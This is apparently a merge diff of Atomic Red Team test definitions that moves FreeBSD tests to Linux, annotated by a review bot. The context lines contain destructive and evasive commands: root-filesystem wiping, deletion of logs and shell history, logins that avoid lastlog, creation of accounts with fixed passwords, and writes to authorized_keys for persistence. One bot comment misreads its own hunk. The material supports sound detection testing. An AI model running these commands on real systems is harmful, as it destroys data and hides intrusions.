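Review bot: `dependencies:` appears twice in a row here; with the header counting 9 lines before and 8 after, two lines were removed and one added, so one `dependencies:` is the removed side and the other the added side (the difference is probably indentation or a neighbouring key that this view flattens). Please confirm the merged file has exactly one `dependencies:` key at the test level: a duplicated mapping key is rejected by strict YAML loaders and silently last-wins in lenient ones, either of which would drop the python/requests prereq check.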
@@ -26,7 +26,7 @@ Commands such as <code>net localgroup</code> of the [Net](https://attack.mitre.o
## Atomic Test #1 - Permission Groups Discovery (Local)
Permission Groups Discovery

**Supported Platforms:** Freebsd, macOS, Linux
**Supported Platforms:** Linux, macOS


**auto_generated_guid:** 952931a4-af0b-4335-bbbe-73c8c5b327ae

@@ -6,9 +6,8 @@ atomic_tests:
description: |
Permission Groups Discovery
supported_platforms:
- freebsd
- macos
- linux
- macos
executor:
command: |
if [ -x "$(command -v dscacheutil)" ]; then dscacheutil -q group; else echo "dscacheutil is missing from the machine. skipping..."; fi;

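Review bot: besides dropping `- freebsd`, this hunk moves `- macos` from before `- linux` to after it (9 lines before, 8 after: two removed, one added); the reorder carries no meaning and only adds noise, so keep the original order unless the generator sorts the list. The `dscacheutil` guard in the context line is the right pattern for a multi-platform test: it probes with `command -v` and prints a skip message instead of failing on platforms that lack the tool.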
@@ -107,7 +107,7 @@ if [ -d /var/audit ] ; then touch #{macos_audit_path} ; fi
## Atomic Test #2 - rm -rf
Delete messages and security logs

**Supported Platforms:** Freebsd
**Supported Platforms:** Linux


**auto_generated_guid:** bd8ccc45-d632-481e-b7cf-c467627d68f9
@@ -211,7 +211,7 @@ touch #{system_log_path}
## Atomic Test #5 - Truncate system log files via truncate utility (freebsd)
This test truncates the system log files using the truncate utility with (-s 0 or --size=0) parameter which sets file size to zero, thus emptying the file content

**Supported Platforms:** Freebsd
**Supported Platforms:** Linux


**auto_generated_guid:** 14033063-ee04-4eaf-8f5d-ba07ca7a097c
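Review bot: the platform line flips from `Freebsd` to `Linux` while the heading of Test #5 still says "(freebsd)"; a FreeBSD-only test has been relabelled Linux-only without being renamed, so either restore Freebsd or rename the test (its YAML `name:`). Test #2 above gets the same flip, and the "security logs" in its description are FreeBSD's /var/log/security, which a Linux host does not normally have, so check that its executor still targets a path that exists on the declared platform.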
@@ -286,7 +286,7 @@ touch #{system_log_path}
## Atomic Test #7 - Delete log files via cat utility by appending /dev/null or /dev/zero (freebsd)
The first sub-test truncates the log file to zero bytes via /dev/null and the second sub-test fills the log file with null bytes(zeroes) via /dev/zero, using cat utility

**Supported Platforms:** Freebsd
**Supported Platforms:** Linux


**auto_generated_guid:** 369878c6-fb04-48d6-8fc2-da9d97b3e054
@@ -397,7 +397,7 @@ sudo echo '' > #{system_log_path}
## Atomic Test #10 - Overwrite FreeBSD system log via echo utility
This test overwrites the contents of system log file with an empty string using echo utility

**Supported Platforms:** Freebsd
**Supported Platforms:** Linux


**auto_generated_guid:** 11cb8ee1-97fb-4960-8587-69b8388ee9d9
@@ -498,7 +498,7 @@ touch #{system_log_path}
## Atomic Test #13 - Delete system log files via unlink utility (freebsd)
This test deletes the messages log file using unlink utility

**Supported Platforms:** Freebsd
**Supported Platforms:** Linux


**auto_generated_guid:** 45ad4abd-19bd-4c5f-a687-41f3eee8d8c2

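Review bot: same relabelling as tests #5, #7 and #10: the headings keep "(freebsd)" (and #10 says "Overwrite FreeBSD system log") while every platform line becomes `Linux`. Separately, the `@@ -397` context line `sudo echo '' > #{system_log_path}` has a bug worth its own fix: the redirection is performed by the caller's unprivileged shell, not by sudo, so against a root-owned log the write is denied and the test does not do what its description claims; the test should rely on `elevation_required: true` instead of a per-command sudo.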
@@ -37,7 +37,7 @@ atomic_tests:
description: |
Delete messages and security logs
supported_platforms:
- freebsd
- linux
executor:
command: |
rm -rf /var/log/messages
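Review bot: the description promises "messages and security logs" but the first executor line removes only /var/log/messages; if the remaining lines delete /var/log/security, that path is FreeBSD-specific and becomes a no-op under the Linux-only platform this hunk leaves behind (the 7/7 header with one extra rendered line means `- freebsd` and `- linux` swapped). `rm -f` is enough for a single file; `-r` is unnecessary here.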
@@ -86,7 +86,7 @@ atomic_tests:
description: |
This test truncates the system log files using the truncate utility with (-s 0 or --size=0) parameter which sets file size to zero, thus emptying the file content
supported_platforms:
- freebsd
- linux
executor:
command: |
truncate -s 0 /var/log/messages #size parameter shorthand
@@ -124,7 +124,7 @@ atomic_tests:
description: |
The first sub-test truncates the log file to zero bytes via /dev/null and the second sub-test fills the log file with null bytes(zeroes) via /dev/zero, using cat utility
supported_platforms:
- freebsd
- linux
executor:
command: |
cat /dev/null > /var/log/messages #truncating the file to zero bytes
@@ -187,7 +187,7 @@ atomic_tests:
description: |
This test overwrites the contents of system log file with an empty string using echo utility
supported_platforms:
- freebsd
- linux
executor:
command: |
echo '' > /var/log/messages
@@ -234,7 +234,7 @@ atomic_tests:
description: |
This test deletes the messages log file using unlink utility
supported_platforms:
- freebsd
- linux
executor:
command: |
unlink /var/log/messages

@@ -88,7 +88,7 @@ rm ~/.bash_history
## Atomic Test #2 - Clear sh history (rm)
Clears sh history via rm

**Supported Platforms:** Freebsd
**Supported Platforms:** Linux


**auto_generated_guid:** 448893f8-1d5d-4ae2-9017-7fcd73a7e100
@@ -144,7 +144,7 @@ echo "" > ~/.bash_history
## Atomic Test #4 - Clear sh history (echo)
Clears sh history via echo

**Supported Platforms:** Freebsd
**Supported Platforms:** Linux


**auto_generated_guid:** a4d63cb3-9ed9-4837-9480-5bf6b09a6c96
@@ -200,7 +200,7 @@ cat /dev/null > ~/.bash_history
## Atomic Test #6 - Clear sh history (cat dev/null)
Clears sh history via cat /dev/null

**Supported Platforms:** Freebsd
**Supported Platforms:** Linux


**auto_generated_guid:** ecaefd53-6fa4-4781-ba51-d9d6fb94dbdc
@@ -256,7 +256,7 @@ ln -sf /dev/null ~/.bash_history
## Atomic Test #8 - Clear sh history (ln dev/null)
Clears sh history via a symlink to /dev/null

**Supported Platforms:** Freebsd
**Supported Platforms:** Linux


**auto_generated_guid:** 3126aa7a-8768-456f-ae05-6ab2d4accfdd
@@ -312,7 +312,7 @@ truncate -s0 ~/.bash_history
## Atomic Test #10 - Clear sh history (truncate)
Clears sh history via truncate

**Supported Platforms:** Freebsd
**Supported Platforms:** Linux


**auto_generated_guid:** e14d9bb0-c853-4503-aa89-739d5c0a5818
@@ -370,7 +370,7 @@ history -c
## Atomic Test #12 - Clear history of a bunch of shells (freebsd)
Clears the history of a bunch of different shell types by setting the history size to zero

**Supported Platforms:** Freebsd
**Supported Platforms:** Linux


**auto_generated_guid:** 9bf7c8af-5e12-42ea-bf6b-b0348fb9dfb0
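Review bot: "(freebsd)" in the heading and `Linux` in the platform line now contradict each other, and the test directly above (whose `history -c` command is the context line) appears to be its non-FreeBSD counterpart, so if FreeBSD is really being dropped this entry becomes a duplicate and should be removed rather than relabelled. "a bunch of" is also informal for a test name; "multiple shells" reads better.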
@@ -514,7 +514,7 @@ echo -e 'pwd101!\npwd101!' | passwd testuser1
## Atomic Test #16 - Disable sh History Logging with SSH -T (freebsd)
Keeps history clear and stays out of lastlog,wtmp,btmp ssh -T keeps the ssh client from catching a proper TTY, which is what usually gets logged on lastlog

**Supported Platforms:** Freebsd
**Supported Platforms:** Linux


**auto_generated_guid:** ec3f2306-dd19-4c4b-bed7-92d20e9b1dee

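Review bot: the description is two sentences run together ("... lastlog,wtmp,btmp ssh -T keeps ..."); split after "btmp" and space the comma list. It also overstates the effect in a way that matters for anyone writing detections from it: `ssh -T` skips PTY allocation, which is what keeps the session out of utmp/wtmp/lastlog, but sshd's own authentication log lines (syslog auth facility) are written whether or not a TTY is allocated, so the login is still recorded there. The heading's "(freebsd)" again conflicts with the `Linux` platform line.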
@@ -17,7 +17,7 @@ atomic_tests:
description: |
Clears sh history via rm
supported_platforms:
- freebsd
- linux
executor:
command: |
rm ~/.sh_history
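Review bot: with `- freebsd` swapped for `- linux` (7/7 header, one extra rendered line), this test now targets `~/.sh_history` on a platform where /bin/sh is typically dash or bash running as sh, neither of which writes that file by default, so the command usually fails on a missing file and the test exercises nothing. Either keep the FreeBSD platform, or add a prereq that creates the file and use `rm -f` so a missing file does not register as a failed test.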
@@ -38,7 +38,7 @@ atomic_tests:
description: |
Clears sh history via echo
supported_platforms:
- freebsd
- linux
executor:
command: |
echo "" > ~/.sh_history
@@ -59,7 +59,7 @@ atomic_tests:
description: |
Clears sh history via cat /dev/null
supported_platforms:
- freebsd
- linux
executor:
command: |
cat /dev/null > ~/.sh_history
@@ -81,7 +81,7 @@ atomic_tests:
description: |
Clears sh history via a symlink to /dev/null
supported_platforms:
- freebsd
- linux
executor:
command: |
ln -sf /dev/null ~/.sh_history
@@ -101,7 +101,7 @@ atomic_tests:
description: |
Clears sh history via truncate
supported_platforms:
- freebsd
- linux
executor:
command: |
truncate -s0 ~/.sh_history
@@ -124,7 +124,7 @@ atomic_tests:
description: |
Clears the history of a bunch of different shell types by setting the history size to zero
supported_platforms:
- freebsd
- linux
executor:
command: |
unset HISTFILE
@@ -192,7 +192,7 @@ atomic_tests:
description: |
Keeps history clear and stays out of lastlog,wtmp,btmp ssh -T keeps the ssh client from catching a proper TTY, which is what usually gets logged on lastlog
supported_platforms:
- freebsd
- linux
dependencies:
- description: |
Install sshpass and create user account used for excuting

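Review bot: "excuting" should be "executing" in the dependency description, and the sentence should say what the account is used for executing. This dependency creates a user with a fixed password (the `passwd testuser1` context line in the README hunk shows it): make sure the test's cleanup removes that account, since a leftover password-login user is a worse artefact to leave on a host than the history file the test is about.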
@@ -34,7 +34,7 @@ There are tools available from the host operating system to perform cleanup, but
## Atomic Test #1 - Delete a single file - FreeBSD/Linux/macOS
Delete a single file from the temporary directory

**Supported Platforms:** Freebsd, Linux, macOS
**Supported Platforms:** Linux, macOS


**auto_generated_guid:** 562d737f-2fc6-4b09-8c2a-7f8ff0828480
@@ -84,7 +84,7 @@ mkdir -p #{parent_folder} && touch #{file_to_delete}
## Atomic Test #2 - Delete an entire folder - FreeBSD/Linux/macOS
Recursively delete the temporary directory and all files contained within it

**Supported Platforms:** Freebsd, Linux, macOS
**Supported Platforms:** Linux, macOS


**auto_generated_guid:** a415f17e-ce8d-4ce2-a8b4-83b674e7017e
@@ -372,7 +372,7 @@ rm -rf / --no-preserve-root > /dev/null 2> /dev/null
## Atomic Test #9 - Delete Filesystem - FreeBSD
This test deletes the entire root filesystem of a FreeBSD system. This technique was used by Amnesia IoT malware to avoid analysis. This test is dangerous and destructive, do NOT use on production equipment.

**Supported Platforms:** Freebsd
**Supported Platforms:** Linux


**auto_generated_guid:** b5aaca7e-a48f-4f1b-8f0f-a27b8f516608

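Review bot: this relabel is wrong, not cosmetic: the test is named "Delete Filesystem - FreeBSD", its description says it wipes "a FreeBSD system", and its executor (see the `chflags -R 0 /` YAML hunk) uses a BSD utility, yet the platform line now reads `Linux` only. Given the destructive nature the description already warns about, a Linux-only label invites running it on the wrong box by mistake. Restore `Freebsd` or drop the test.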
@@ -6,7 +6,6 @@ atomic_tests:
description: |
Delete a single file from the temporary directory
supported_platforms:
- freebsd
- linux
- macos
input_arguments:
@@ -37,7 +36,6 @@ atomic_tests:
description: |
Recursively delete the temporary directory and all files contained within it
supported_platforms:
- freebsd
- linux
- macos
input_arguments:
@@ -182,7 +180,7 @@ atomic_tests:
description: |
This test deletes the entire root filesystem of a FreeBSD system. This technique was used by Amnesia IoT malware to avoid analysis. This test is dangerous and destructive, do NOT use on production equipment.
supported_platforms:
- freebsd
- linux
executor:
command: |
chflags -R 0 /

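Review bot: `chflags` is a BSD/macOS command that does not exist on Linux (the Linux analogue is `chattr`), so swapping `- freebsd` for `- linux` leaves a test whose first executor line cannot run on its only declared platform. Because that command clears the immutable and undeletable flags under `/` as the prelude to wiping the disk, this is a test where a runner trusting the wrong platform label matters; keep it FreeBSD-only and consider a prereq that refuses to run unless `uname -s` reports FreeBSD.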
@@ -28,7 +28,7 @@ Timestomping may be used along with file name [Masquerading](https://attack.mitr
## Atomic Test #1 - Set a file's access timestamp
Stomps on the access timestamp of a file

**Supported Platforms:** Freebsd, Linux, macOS
**Supported Platforms:** Linux, macOS


**auto_generated_guid:** 5f9113d5-ed75-47ed-ba23-ea3573d05810
@@ -77,7 +77,7 @@ echo 'T1070.006 file access timestomp test' > #{target_filename}
## Atomic Test #2 - Set a file's modification timestamp
Stomps on the modification timestamp of a file

**Supported Platforms:** Freebsd, Linux, macOS
**Supported Platforms:** Linux, macOS


**auto_generated_guid:** 20ef1523-8758-4898-b5a2-d026cc3d2c52
@@ -129,7 +129,7 @@ Stomps on the create timestamp of a file
Setting the creation timestamp requires changing the system clock and reverting.
Sudo or root privileges are required to change date. Use with caution.

**Supported Platforms:** Freebsd, Linux, macOS
**Supported Platforms:** Linux, macOS


**auto_generated_guid:** 8164a4a6-f99c-4661-ac4f-80f5e4e78d2b
@@ -172,7 +172,7 @@ Modifies the `modify` and `access` timestamps using the timestamps of a specifie

This technique was used by the threat actor Rocke during the compromise of Linux web servers.

**Supported Platforms:** Freebsd, Linux, macOS
**Supported Platforms:** Linux, macOS


**auto_generated_guid:** 631ea661-d661-44b0-abdb-7a7f3fc08e50

@@ -6,7 +6,6 @@ atomic_tests:
description: |
Stomps on the access timestamp of a file
supported_platforms:
- freebsd
- linux
- macos
input_arguments:
@@ -33,7 +32,6 @@ atomic_tests:
description: |
Stomps on the modification timestamp of a file
supported_platforms:
- freebsd
- linux
- macos
input_arguments:
@@ -62,7 +60,6 @@ atomic_tests:
Setting the creation timestamp requires changing the system clock and reverting.
Sudo or root privileges are required to change date. Use with caution.
supported_platforms:
- freebsd
- linux
- macos
input_arguments:
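Review bot: the context lines say this test changes the system clock and reverts it; that side effect deserves a caveat in the description, because on a monitored host the clock jump itself is visible (NTP drift alerts, out-of-order log timestamps), and that is also what a defender should key on, since most filesystems expose no API for setting a file's birth time directly. The description should also state that the revert runs even if the touch step fails, otherwise a failed test leaves the clock wrong.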
@@ -88,7 +85,6 @@ atomic_tests:

This technique was used by the threat actor Rocke during the compromise of Linux web servers.
supported_platforms:
- freebsd
- linux
- macos
input_arguments:

@@ -115,7 +115,7 @@ Remove-Item "PathToAtomicsFolder\..\ExternalPayloads\curl.zip"
This test simulates an infected host beaconing to command and control.
Inspired by APTSimulator - https://github.com/NextronSystems/APTSimulator/blob/master/test-sets/command-and-control/malicious-user-agents.bat

**Supported Platforms:** Freebsd, Linux, macOS
**Supported Platforms:** Linux, macOS


**auto_generated_guid:** 2d7c471a-e887-4b78-b0dc-b0df1f2e0658

@@ -66,7 +66,6 @@ atomic_tests:
This test simulates an infected host beaconing to command and control.
Inspired by APTSimulator - https://github.com/NextronSystems/APTSimulator/blob/master/test-sets/command-and-control/malicious-user-agents.bat
supported_platforms:
- freebsd
- linux
- macos
input_arguments:

@@ -91,7 +91,7 @@ curl -s https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ato
## Atomic Test #3 - Stage data from Discovery.sh (freebsd)
Utilize curl to download discovery.sh and execute a basic information gathering shell script

**Supported Platforms:** Freebsd
**Supported Platforms:** Linux


**auto_generated_guid:** 4fca7b49-379d-4493-8890-d6297750fa46

@@ -40,7 +40,7 @@ atomic_tests:
description: |
Utilize curl to download discovery.sh and execute a basic information gathering shell script
supported_platforms:
- freebsd
- linux
input_arguments:
output_file:
description: Location to save downloaded discovery.bat file

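Review bot: the `output_file` description says "discovery.bat" but this test downloads and runs discovery.sh (the `.bat` wording was carried over from the Windows variant); fix the string. The README hunk above also keeps "(freebsd)" in the test name while its platform line becomes `Linux`, and since the context line fetches the script by URL from the `master` branch of the upstream repo, a FreeBSD-specific discovery.sh run under a Linux label executes whatever that branch currently serves; state the platform correctly and consider pinning the URL to a commit.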
@@ -310,7 +310,7 @@ userdel -r art
## Atomic Test #9 - Create local account (FreeBSD)
An adversary may wish to create an account with admin privileges to work with. In this test we create a "art" user with the password art, switch to art, execute whoami, exit and delete the art user.

**Supported Platforms:** Freebsd
**Supported Platforms:** Linux


**auto_generated_guid:** 95158cc9-8f6d-4889-9531-9be3f7f095e0
@@ -389,7 +389,7 @@ A system administrator may have locked and expired a user account rather than de

In this test we create a "art" user with the password art, lock and expire the account, try to su to art and fail, unlock and renew the account, su successfully, then delete the account.

**Supported Platforms:** Freebsd
**Supported Platforms:** Linux


**auto_generated_guid:** 09e3380a-fae5-4255-8b19-9950be0252cf
@@ -469,7 +469,7 @@ cat /etc/passwd |grep nobody
## Atomic Test #13 - Login as nobody (freebsd)
An adversary may try to re-purpose a system account to appear legitimate. In this test change the login shell of the nobody account, change its password to nobody, su to nobody, exit, then reset nobody's shell to /usr/sbin/nologin.

**Supported Platforms:** Freebsd
**Supported Platforms:** Linux


**auto_generated_guid:** 16f6374f-7600-459a-9b16-6a88fd96d310

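Review bot: "In this test change the login shell" is missing its subject ("we change"). The cleanup resets nobody's shell to the hard-coded /usr/sbin/nologin, which is where FreeBSD (and Debian-family Linux) keep it; on other Linux families nologin lives in /sbin, so with the platform relabelled to `Linux` the cleanup can leave the nobody account pointing at a non-existent shell or, worse, at the interactive shell the test set. Prefer restoring whatever shell the account had before the test (the `cat /etc/passwd |grep nobody` context line already captures it) rather than a fixed path.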
@@ -123,7 +123,7 @@ atomic_tests:
description: |
An adversary may wish to create an account with admin privileges to work with. In this test we create a "art" user with the password art, switch to art, execute whoami, exit and delete the art user.
supported_platforms:
- freebsd
- linux
executor:
name: sh
elevation_required: true
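Review bot: the 7/7 header with one extra rendered line means `- freebsd` was replaced by `- linux`, turning the "(FreeBSD)" account-creation test into a Linux-only one; the executor command is outside this hunk, so please confirm it does not rely on FreeBSD's `pw` user-management tool, which Linux lacks (the `userdel -r art` context line in the README hunk belongs to the test above this one, not to it). In the description, 'a "art" user' should be 'an "art" user'.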
@@ -164,7 +164,7 @@ atomic_tests:

In this test we create a "art" user with the password art, lock and expire the account, try to su to art and fail, unlock and renew the account, su successfully, then delete the account.
supported_platforms:
- freebsd
- linux
executor:
name: sh
elevation_required: true
@@ -206,7 +206,7 @@ atomic_tests:
description: |
An adversary may try to re-purpose a system account to appear legitimate. In this test change the login shell of the nobody account, change its password to nobody, su to nobody, exit, then reset nobody's shell to /usr/sbin/nologin.
supported_platforms:
- freebsd
- linux
executor:
name: sh
elevation_required: true

@@ -134,7 +134,7 @@ ls -al /Applications
## Atomic Test #3 - List OS Information
Identify System Info

**Supported Platforms:** Freebsd, Linux, macOS
**Supported Platforms:** Linux, macOS


**auto_generated_guid:** cccb070c-df86-4216-a5bc-9fb60c74e27c
@@ -244,7 +244,7 @@ sudo lsmod | grep -i "hv_vmbus\|hv_blkvsc\|hv_netvsc\|hv_utils\|hv_storvsc"
## Atomic Test #6 - FreeBSD VM Check via Kernel Modules
Identify virtual machine host kernel modules.

**Supported Platforms:** Freebsd
**Supported Platforms:** Linux


**auto_generated_guid:** eefe6a49-d88b-41d8-8fc2-b46822da90d3
@@ -301,7 +301,7 @@ hostname
## Atomic Test #8 - Hostname Discovery
Identify system hostname for FreeBSD, Linux and macOS systems.

**Supported Platforms:** Freebsd, Linux, macOS
**Supported Platforms:** Linux, macOS


**auto_generated_guid:** 486e88ea-4f56-470f-9b57-3f4d73f39133
@@ -433,7 +433,7 @@ set
## Atomic Test #12 - Environment variables discovery on freebsd, macos and linux
Identify all environment variables. Upon execution, environments variables and your path info will be displayed.

**Supported Platforms:** Freebsd, macOS, Linux
**Supported Platforms:** Linux, macOS


**auto_generated_guid:** fcbdd43f-f4ad-42d5-98f3-0218097e2720
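Review bot: the heading still lists "freebsd" after the platform line drops it, and "environments variables" should be "environment variables"; both strings come from the YAML `name:` and `description:`, so fix them there and regenerate. Test #8 above has the same leftover ("for FreeBSD, Linux and macOS systems") in its description.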
@@ -904,7 +904,7 @@ grep vmw /proc/modules
## Atomic Test #26 - FreeBSD List Kernel Modules
Enumerate kernel modules loaded. Upon successful execution stdout will display kernel modules loaded, followed by list of modules matching 'vmm' if present.

**Supported Platforms:** Freebsd
**Supported Platforms:** Linux


**auto_generated_guid:** 4947897f-643a-4b75-b3f5-bed6885749f6

@@ -28,7 +28,6 @@ atomic_tests:
description: |
Identify System Info
supported_platforms:
- freebsd
- linux
- macos
input_arguments:
@@ -85,7 +84,7 @@ atomic_tests:
description: |
Identify virtual machine host kernel modules.
supported_platforms:
- freebsd
- linux
executor:
command: |
kldstat | grep -i "vmm"
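Review bot: `kldstat` is the FreeBSD kernel-module lister and does not exist on Linux (Linux uses `lsmod`, which the sibling "VM Check via Kernel Modules" test with the `sudo lsmod | grep -i "hv_vmbus..."` context line already covers), so replacing `- freebsd` with `- linux` leaves this test unable to run on its only platform; the README hunk for the same GUID also still calls it "FreeBSD VM Check". Keep the FreeBSD platform or delete the test.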
@@ -106,7 +105,6 @@ atomic_tests:
description: |
Identify system hostname for FreeBSD, Linux and macOS systems.
supported_platforms:
- freebsd
- linux
- macos
executor:
@@ -165,9 +163,8 @@ atomic_tests:
description: |
Identify all environment variables. Upon execution, environments variables and your path info will be displayed.
supported_platforms:
- freebsd
- macos
- linux
- macos
executor:
command: |
env
@@ -369,7 +366,7 @@ atomic_tests:
description: |
Enumerate kernel modules loaded. Upon successful execution stdout will display kernel modules loaded, followed by list of modules matching 'vmm' if present.
supported_platforms:
- freebsd
- linux
executor:
command: |
kldstat

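Review bot: same problem as the VM-check hunk above: `kldstat` does not exist on Linux, so a `- linux` platform cannot execute this test, and the README entry for this GUID is still titled "FreeBSD List Kernel Modules". If the intent is a Linux module listing, that is `lsmod` or `/proc/modules` and already exists as a separate test (the `grep vmw /proc/modules` context line in the README hunk).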
@@ -103,7 +103,7 @@ http://osxdaily.com/2013/01/29/list-all-files-subdirectory-contents-recursively/

https://perishablepress.com/list-files-folders-recursively-terminal/

**Supported Platforms:** Freebsd, macOS, Linux
**Supported Platforms:** Linux, macOS


**auto_generated_guid:** ffc8b249-372a-4b74-adcd-e4c0430842de
@@ -147,7 +147,7 @@ rm #{output_file}
## Atomic Test #4 - Nix File and Directory Discovery 2
Find or discover files on the file system

**Supported Platforms:** Freebsd, macOS, Linux
**Supported Platforms:** Linux, macOS


**auto_generated_guid:** 13c5e1ae-605b-46c4-a79f-db28c77ff24e

@@ -47,9 +47,8 @@ atomic_tests:

https://perishablepress.com/list-files-folders-recursively-terminal/
supported_platforms:
- freebsd
- macos
- linux
- macos
input_arguments:
output_file:
description: Output file used to store the results.
@@ -73,9 +72,8 @@ atomic_tests:
description: |
Find or discover files on the file system
supported_platforms:
- freebsd
- macos
- linux
- macos
input_arguments:
output_file:
description: Output file used to store the results.

@@ -34,7 +34,7 @@ Commands such as <code>net user</code> and <code>net localgroup</code> of the [N
## Atomic Test #1 - Enumerate all accounts (Local)
Enumerate all accounts by copying /etc/passwd to another file

**Supported Platforms:** Freebsd, Linux
**Supported Platforms:** Linux


**auto_generated_guid:** f8aab3dd-5990-4bf8-b8ab-2226c951696f
@@ -72,7 +72,7 @@ rm -f #{output_file}
## Atomic Test #2 - View sudoers access
(requires root)

**Supported Platforms:** Freebsd, Linux, macOS
**Supported Platforms:** Linux, macOS


**auto_generated_guid:** fed9be70-0186-4bde-9f8a-20945f9370c2
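Review bot: "(requires root)" is the entire description of Test #2; it states a prerequisite, not what the test does. Describe the action the executor performs (it is outside this hunk, so take the wording from there), and express the root requirement through `elevation_required: true` in the YAML, which is what the runner actually honours.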
@@ -111,7 +111,7 @@ rm -f #{output_file}
## Atomic Test #3 - View accounts with UID 0
View accounts with UID 0

**Supported Platforms:** Freebsd, Linux, macOS
**Supported Platforms:** Linux, macOS


**auto_generated_guid:** c955a599-3653-4fe5-b631-f11c00eb0397
@@ -150,7 +150,7 @@ rm -f #{output_file} 2>/dev/null
## Atomic Test #4 - List opened files by user
List opened files by user

**Supported Platforms:** Freebsd, Linux, macOS
**Supported Platforms:** Linux, macOS


**auto_generated_guid:** 7e46c7a5-0142-45be-a858-1a3ecb4fd3cb
@@ -240,7 +240,7 @@ sudo apt-get install login; exit 1;
## Atomic Test #6 - Show if a user account has ever logged in remotely (freebsd)
Show if a user account has ever logged in remotely

**Supported Platforms:** Freebsd
**Supported Platforms:** Linux


**auto_generated_guid:** 0f73418f-d680-4383-8a24-87bc97fe4e35
@@ -278,7 +278,7 @@ rm -f #{output_file}
## Atomic Test #7 - Enumerate users and groups
Utilize groups and id to enumerate users and groups

**Supported Platforms:** Freebsd, Linux, macOS
**Supported Platforms:** Linux, macOS


**auto_generated_guid:** e6f36545-dc1e-47f0-9f48-7f730f54a02e

@@ -6,7 +6,6 @@ atomic_tests:
description: |
Enumerate all accounts by copying /etc/passwd to another file
supported_platforms:
- freebsd
- linux
input_arguments:
output_file:
@@ -25,7 +24,6 @@ atomic_tests:
description: |
(requires root)
supported_platforms:
- freebsd
- linux
- macos
input_arguments:
@@ -47,7 +45,6 @@ atomic_tests:
description: |
View accounts with UID 0
supported_platforms:
- freebsd
- linux
- macos
input_arguments:
@@ -68,7 +65,6 @@ atomic_tests:
description: |
List opened files by user
supported_platforms:
- freebsd
- linux
- macos
executor:
@@ -114,7 +110,7 @@ atomic_tests:
description: |
Show if a user account has ever logged in remotely
supported_platforms:
- freebsd
- linux
input_arguments:
output_file:
description: Path where captured results will be placed
@@ -133,7 +129,6 @@ atomic_tests:
description: |
Utilize groups and id to enumerate users and groups
supported_platforms:
- freebsd
- linux
- macos
executor:

@@ -20,7 +20,7 @@ Enable traffic redirection.

Note that this test may conflict with pre-existing system configuration.

**Supported Platforms:** Freebsd, macOS, Linux
**Supported Platforms:** Linux, macOS


**auto_generated_guid:** 0ac21132-4485-4212-a681-349e8a6637cd

@@ -8,9 +8,8 @@ atomic_tests:

Note that this test may conflict with pre-existing system configuration.
supported_platforms:
- freebsd
- macos
- linux
- macos
input_arguments:
proxy_server:
description: Proxy server URL (host:port)

@@ -237,7 +237,7 @@ brew install tor
This test is designed to launch the tor proxy service, which is what is utilized in the background by the Tor Browser and other applications with add-ons in order to provide onion routing functionality.
Upon successful execution, the tor proxy service will be launched.

**Supported Platforms:** Freebsd
**Supported Platforms:** Linux


**auto_generated_guid:** 550ec67d-a99e-408b-816a-689271b27d2a

@@ -124,7 +124,7 @@ atomic_tests:
This test is designed to launch the tor proxy service, which is what is utilized in the background by the Tor Browser and other applications with add-ons in order to provide onion routing functionality.
Upon successful execution, the tor proxy service will be launched.
supported_platforms:
- freebsd
- linux
dependency_executor_name: sh
dependencies:
- description: |

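Review bot: the `- freebsd` to `- linux` swap (7/7 header) keeps the `dependency_executor_name: sh` block, whose install step is cut off in this hunk; if that step calls FreeBSD's `pkg`, the dependency can never be satisfied on the Linux platform now declared. The `brew install tor` context line in the README hunk shows a macOS variant already exists, so check whether a Linux tor test also already exists before relabelling this one instead of removing it.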
@@ -19,7 +19,7 @@ SSH keys can also be added to accounts on network devices, such as with the `ip
Modify contents of <user-home>/.ssh/authorized_keys to maintain persistence on victim host.
If the user is able to save the same contents in the authorized_keys file, it shows user can modify the file.

**Supported Platforms:** Freebsd, macOS, Linux
**Supported Platforms:** Linux, macOS


**auto_generated_guid:** 342cc723-127c-4d3a-8292-9c0c6b4ecadc

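Review bot: "it shows user can modify the file" should be "it shows the user can modify the file". The second sentence also undersells what the test is good for: re-writing authorized_keys with its existing contents still changes the file's mtime and trips file-integrity or auditd watches on ~/.ssh, which is exactly the signal a defender should expect when this test runs; one sentence saying so would make the description useful to the detection side.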
@@ -9,9 +9,8 @@ atomic_tests:
|
||||
Modify contents of <user-home>/.ssh/authorized_keys to maintain persistence on victim host.
|
||||
If the user is able to save the same contents in the authorized_keys file, it shows user can modify the file.
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- macos
|
||||
- linux
|
||||
- macos
|
||||
executor:
|
||||
name: sh
|
||||
elevation_required: false
|
||||
|
||||
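Review bot: the hunk header `-9,9 +9,8` says one line is dropped and none added, and `- macos` appears both before and after `- linux`, so the removed line is the duplicate `macos` entry; that is the right fix, but make sure the surviving order is `freebsd, linux, macos` so the generated markdown matches the other tests in this change. One caveat for the FreeBSD case: the executor runs as `sh` with `elevation_required: false` and writes to `<user-home>/.ssh/authorized_keys`; sshd enforces `StrictModes` by default, so the test (or its prerequisite) should keep `~/.ssh` at mode 0700 and the file at 0600, otherwise the appended key is ignored and the persistence this test is meant to exercise never takes effect.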
@@ -72,7 +72,7 @@ On Windows, adversaries may use various utilities to download tools, such as `co
|
||||
## Atomic Test #1 - rsync remote file copy (push)
|
||||
Utilize rsync to perform a remote file copy (push)
|
||||
|
||||
**Supported Platforms:** Freebsd, Linux, macOS
|
||||
**Supported Platforms:** Linux, macOS
|
||||
|
||||
|
||||
**auto_generated_guid:** 0fc6e977-cb12-44f6-b263-2824ba917409
|
||||
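Review bot: `Freebsd, Linux, macOS` versus `Linux, macOS` is a single-line swap here, and the matching YAML hunk for this test (`@@ -6,7 +6,6 @@`) drops one line from `supported_platforms`, so this merge either removes or restores FreeBSD for the rsync, scp, sftp and whois tests as a group; whichever side is intended, the markdown and YAML must move together and the technique indexes should be regenerated rather than trusting the merge's line-level resolution. If `freebsd` stays, note that rsync is not in FreeBSD base (`pkg install rsync`), so the prerequisite shown in the next hunk header (`if [ -x "$(command -v rsync)" ]; then exit 0; else exit 1; fi`) needs a `pkg` install branch alongside the Linux and Homebrew ones.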
@@ -120,7 +120,7 @@ if [ -x "$(command -v rsync)" ]; then exit 0; else exit 1; fi
|
||||
## Atomic Test #2 - rsync remote file copy (pull)
|
||||
Utilize rsync to perform a remote file copy (pull)
|
||||
|
||||
**Supported Platforms:** Freebsd, Linux, macOS
|
||||
**Supported Platforms:** Linux, macOS
|
||||
|
||||
|
||||
**auto_generated_guid:** 3180f7d5-52c0-4493-9ea0-e3431a84773f
|
||||
@@ -168,7 +168,7 @@ if [ -x "$(command -v rsync)" ]; then exit 0; else exit 1; fi
|
||||
